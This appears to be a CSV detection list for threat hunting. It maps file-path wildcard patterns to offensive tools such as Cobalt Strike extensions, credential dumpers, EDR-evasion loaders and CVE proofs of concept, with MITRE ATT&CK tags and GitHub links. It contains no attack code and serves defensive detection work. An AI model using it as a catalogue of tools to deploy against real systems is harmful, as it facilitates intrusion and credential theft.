-*/0tt7/CVE-2022-23131*,offensive_tool_keyword,POC,POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML),T1548 - T1190,TA0004,N/A,N/A,Exploitation tools,https://github.com/0tt7/CVE-2022-23131,1,1,N/A,N/A,1,15,9,2022-02-21T08:25:56Z,2022-02-21T00:51:14Z
-*/0xdarkvortex-*,offensive_tool_keyword,prometheus,malware C2,T1071 - T1071.001 - T1105 - T1105.002 - T1106 - T1574.002,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/paranoidninja/0xdarkvortex-MalwareDevelopment,1,1,N/A,10,10,176,63,2020-07-21T06:14:44Z,2018-09-04T15:38:53Z
-*/0xIronGoat/dirty-pipe*,offensive_tool_keyword,dirty-pipe,POC exploitation for dirty pipe vulnerability,T1068 - T1055 - T1003 - T1015,TA0001 - TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/0xIronGoat/dirty-pipe,1,1,N/A,N/A,1,9,9,2022-03-08T15:47:53Z,2022-03-08T15:30:45Z
-*/0xthirteen/*,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,1,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z
-*/0xthirteen/StayKit*,offensive_tool_keyword,StayKit,StayKit - Cobalt Strike persistence kit - StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. 
The aggressor script handles payload creation by reading the template files for a specific execution type.,T1059 - T1053 - T1124,TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/0xthirteen/StayKit,1,1,N/A,N/A,10,448,81,2020-01-27T14:53:31Z,2020-01-24T22:20:20Z
-*/1mxml/CVE-2022-23131*,offensive_tool_keyword,POC,POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML),T1190 - T1550 - T1078,TA0001 - TA0003,N/A,N/A,Exploitation tools,https://github.com/1mxml/CVE-2022-23131,1,1,N/A,N/A,1,3,1,2022-02-19T03:14:47Z,2022-02-18T14:48:53Z
-*/365-Stealer.git*,offensive_tool_keyword,365-Stealer,365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack,T1111 - T1566.001 - T1078.004,TA0004 - TA0001 - TA0040,N/A,N/A,Phishing,https://github.com/AlteredSecurity/365-Stealer,1,1,N/A,10,3,288,74,2023-06-15T19:56:12Z,2020-09-20T18:22:36Z
-*/3DESEncryptor.go*,offensive_tool_keyword,Augustus,Augustus is a Golang loader that execute shellcode utilizing the process hollowing technique with anti-sandbox and anti-analysis measures. 
The shellcode is encrypted with the Triple DES (3DES) encryption algorithm.,T1055.012 - T1027.002 - T1136.001 - T1562.001,TA0005 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/TunnelGRE/Augustus,1,1,N/A,6,2,107,23,2023-08-27T10:37:51Z,2023-08-21T15:08:40Z
-*/3snake.git*,offensive_tool_keyword,3snake,Tool for extracting information from newly spawned processes,T1003 - T1110 - T1552 - T1505,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/blendin/3snake,1,1,N/A,7,7,688,113,2022-02-14T17:42:10Z,2018-02-07T21:03:15Z
-*/4luc4rdr5290/CVE-2022-0847*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047,TA0001 - TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/4luc4rdr5290/CVE-2022-0847,1,1,N/A,N/A,1,1,2,2022-03-08T20:41:15Z,2022-03-08T20:18:28Z
-*/78dc91f1A716DBBAA9E4E12C884C1CB1C27FFF2BEEED7DF1*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*/78dc91f1A716DBBAA9E4E12C884C1CB1C27FFF2BEEED7DF1*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*/AbandonedCOMKeys/*,offensive_tool_keyword,AbandonedCOMKeys,Enumerates abandoned COM keys (specifically InprocServer32). Useful for persistence,T1547.011 - T1049 - T1087.002,TA0005 - TA0007 - TA0003,N/A,N/A,Persistence,https://github.com/matterpreter/OffensiveCSharp/tree/master/AbandonedCOMKeys,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*/acarsd-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/AceLdr.cna*,offensive_tool_keyword,cobaltstrike,Cobalt Strike UDRL for memory scanner evasion.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - 
Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/kyleavery/AceLdr,1,1,N/A,10,10,712,123,2023-09-28T19:47:03Z,2022-08-11T00:06:09Z -*/acheron.git*,offensive_tool_keyword,acheron,indirect syscalls for AV/EDR evasion in Go assembly,T1055.012 - T1059.001 - T1059.003,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/f1zm0/acheron,1,1,N/A,N/A,3,244,31,2023-06-13T19:20:33Z,2023-04-07T10:40:33Z -*/acheron.go*,offensive_tool_keyword,acheron,indirect syscalls for AV/EDR evasion in Go assembly,T1055.012 - T1059.001 - T1059.003,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/f1zm0/acheron,1,1,N/A,N/A,3,244,31,2023-06-13T19:20:33Z,2023-04-07T10:40:33Z -*/ACLight.git*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,AD Enumeration,https://github.com/cyberark/ACLight,1,1,N/A,7,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z -*/ACLight/*,offensive_tool_keyword,ACLight,A tool for advanced discovery of Privileged Accounts - including Shadow Admins.,T1087 - T1003 - T1208,TA0001 - TA0006 - TA0008,N/A,N/A,Information Gathering,https://github.com/cyberark/ACLight,1,1,N/A,N/A,8,730,150,2019-09-09T06:48:45Z,2017-05-17T09:29:41Z -*/acltoolkit*,offensive_tool_keyword,acltoolkit,acltoolkit is an ACL abuse swiss-army knife. 
It implements multiple ACL abuses,T1222.001 - T1222.002 - T1046,TA0007 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/zblurx/acltoolkit,1,1,N/A,N/A,2,108,14,2023-02-03T10:27:45Z,2022-01-12T22:45:49Z
-*/acm_enum_cas_*.json*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z
-*/acm_enum_certs_*.json*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z
-*/acm_enum_certs_chain_*.json*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z
-*/acm_enum_certs_expired_*.json*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z
-*/acm_enum_certs_info_*.json*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z
-*/ActiveScanPlusPlus*,offensive_tool_keyword,ActiveScanPlusPlus,ActiveScan++ extends Burp Suite's active and passive scanning capabilities. 
Designed to add minimal network overhead. it identifies application behaviour that may be of interest to advanced testers,T1583 - T1595 - T1190,TA0001 - TA0002 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/albinowax/ActiveScanPlusPlus,1,1,N/A,N/A,6,568,192,2022-11-15T13:47:31Z,2014-06-23T10:04:13Z
-*/AD_Enumeration_Hunt*,offensive_tool_keyword,AD_Enumeration_Hunt,This repository contains a collection of PowerShell scripts and commands that can be used for Active Directory (AD) penetration testing and security assessment,T1018 - T1003 - T1033 - T1087 - T1069 - T1046 - T1069.002 - T1047 - T1083,TA0001 - TA0007 - TA0005 - TA0002 - TA0003,N/A,N/A,AD Enumeration,https://github.com/alperenugurlu/AD_Enumeration_Hunt,1,1,N/A,7,1,79,16,2023-08-05T06:10:26Z,2023-08-05T05:16:57Z
-*/ADACLScanner.git*,offensive_tool_keyword,ADACLScanner,A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .,T1222 - T1069 - T1018,TA0002 - TA0007 - TA0043,N/A,N/A,AD Enumeration,https://github.com/canix1/ADACLScanner,1,1,N/A,7,9,809,151,2023-09-12T21:35:21Z,2017-04-06T12:28:37Z
-*/adalanche/modules/*,offensive_tool_keyword,adalanche,Active Directory ACL Visualizer and Explorer - who's really Domain Admin?,T1484 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/lkarlslund/Adalanche,1,1,N/A,N/A,10,1202,119,2023-06-20T13:02:30Z,2020-10-07T10:07:22Z
-*/adconnectdump.git*,offensive_tool_keyword,adconnectdump,Dump Azure AD Connect credentials for Azure AD and Active Directory,T1003.004 - T1059.001 - T1082,TA0006 - TA0002 - TA0007,N/A,N/A,Credential Access,https://github.com/fox-it/adconnectdump,1,1,N/A,10,6,506,84,2023-08-21T00:00:08Z,2019-04-09T07:41:42Z
-*/adcs_enum/*,offensive_tool_keyword,cobaltstrike,Situational Awareness commands implemented using Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - 
T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Situational-Awareness-BOF,1,1,N/A,10,10,964,172,2023-09-22T15:51:55Z,2020-07-15T16:21:18Z -*/adcs_request/adcs_request.*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - 
LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/adcs_request/CertCli.*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/adcs_request/certenroll.*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 
- T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/adcs_request/CertPol.*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/adcs-enum.py*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z
-*/ADCSKiller*,offensive_tool_keyword,ADCSKiller,ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure,T1552.004 - T1003.003 - T1114.002,TA0006 - TA0003 - TA0005,N/A,N/A,Exploitation tools,https://github.com/grimlockx/ADCSKiller,1,1,N/A,N/A,6,535,53,2023-05-19T17:36:37Z,2023-05-19T06:51:41Z
-*/ADCSPwn.git*,offensive_tool_keyword,ADCSPwn,A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service,T1550.002 - T1078.003 - T1110.003,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/bats3c/ADCSPwn,1,1,N/A,10,8,749,119,2023-03-20T20:30:40Z,2021-07-30T15:04:41Z
-*/add_groupmember.py*,offensive_tool_keyword,acltoolkit,acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses,T1222.001 - T1222.002 - T1046,TA0007 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/zblurx/acltoolkit,1,1,N/A,N/A,2,108,14,2023-02-03T10:27:45Z,2022-01-12T22:45:49Z
-*/address-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/AddUser-Bof.*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF that Add an admin user,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/0x3rhy/AddUser-Bof,1,1,N/A,10,10,52,12,2022-10-11T06:51:27Z,2021-08-30T10:09:20Z -*/AddUser-Bof/*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF that Add an admin user,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/0x3rhy/AddUser-Bof,1,1,N/A,10,10,52,12,2022-10-11T06:51:27Z,2021-08-30T10:09:20Z -*/ADFSpoof.py*,offensive_tool_keyword,ADFSpoof,A python tool to forge AD FS security tokens.,T1600 - T1600.001 - T1552 - T1552.004,TA0006 - TA0001,N/A,N/A,Sniffing & Spoofing,https://github.com/mandiant/ADFSpoof,1,1,N/A,10,4,300,52,2023-09-21T17:14:52Z,2019-03-20T22:30:58Z -*/ADFSpray*,offensive_tool_keyword,adfspray,Python3 tool to perform password spraying against Microsoft Online service using various methods,T1110.003,TA0006,N/A,N/A,Credential Access,https://github.com/xFreed0m/ADFSpray,1,1,N/A,N/A,1,75,14,2023-03-12T00:21:34Z,2020-04-23T08:56:51Z -*/ADHunt.git*,offensive_tool_keyword,adhunt,Tool for exploiting Active Directory Enviroments - enumeration,T1018 - T1087 - T1087.002 - T1069 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,AD Enumeration,https://github.com/karendm/ADHunt,1,1,N/A,7,1,41,8,2023-08-10T18:55:39Z,2023-06-20T13:24:10Z -*/ad-ldap-enum.git*,offensive_tool_keyword,ad-ldap-enum,An LDAP based Active Directory user and group enumeration tool,T1087 - T1087.001 - T1018 - T1069 - T1069.002,TA0007 - TA0003 - TA0004,N/A,N/A,AD Enumeration,https://github.com/CroweCybersecurity/ad-ldap-enum,1,1,N/A,6,3,290,72,2023-02-10T19:07:34Z,2015-08-25T19:38:39Z -*/adm2sys.py*,offensive_tool_keyword,PyExec,This is a very simple privilege escalation technique from admin to System. 
This is the same technique PSExec uses.,T1134 - T1055 - T1548.002,TA0004 - TA0005 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/OlivierLaflamme/PyExec,1,1,N/A,9,1,10,6,2019-09-11T13:56:04Z,2019-09-11T13:54:15Z
-*/Admin2Sys.git*,offensive_tool_keyword,Admin2Sys,Admin2Sys it's a C++ malware to escalate privileges from Administrator account to NT AUTORITY SYSTEM,T1055.002 - T1078.003 - T1068,TA0002 - TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/S12cybersecurity/Admin2Sys,1,1,N/A,10,1,31,15,2023-05-01T19:32:41Z,2023-05-01T18:50:51Z
-*/admin-panels.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z
-*/ADRecon*,offensive_tool_keyword,pingcastle,active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands,T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071,TA0006 - TA0008 - TA0009 - TA0011,N/A,N/A,Information Gathering,https://github.com/sense-of-security/ADRecon,1,1,N/A,N/A,10,1514,271,2020-06-15T05:23:14Z,2017-11-29T23:01:53Z
-*/ADSearch.git*,offensive_tool_keyword,adsearch,A tool to help query AD via the LDAP protocol,T1087 - T1069.002 - T1018,TA0003 - TA0002 - TA0007,N/A,N/A,Reconnaissance,https://github.com/tomcarver16/ADSearch,1,1,N/A,N/A,4,370,44,2023-07-07T14:39:50Z,2020-06-17T22:21:41Z
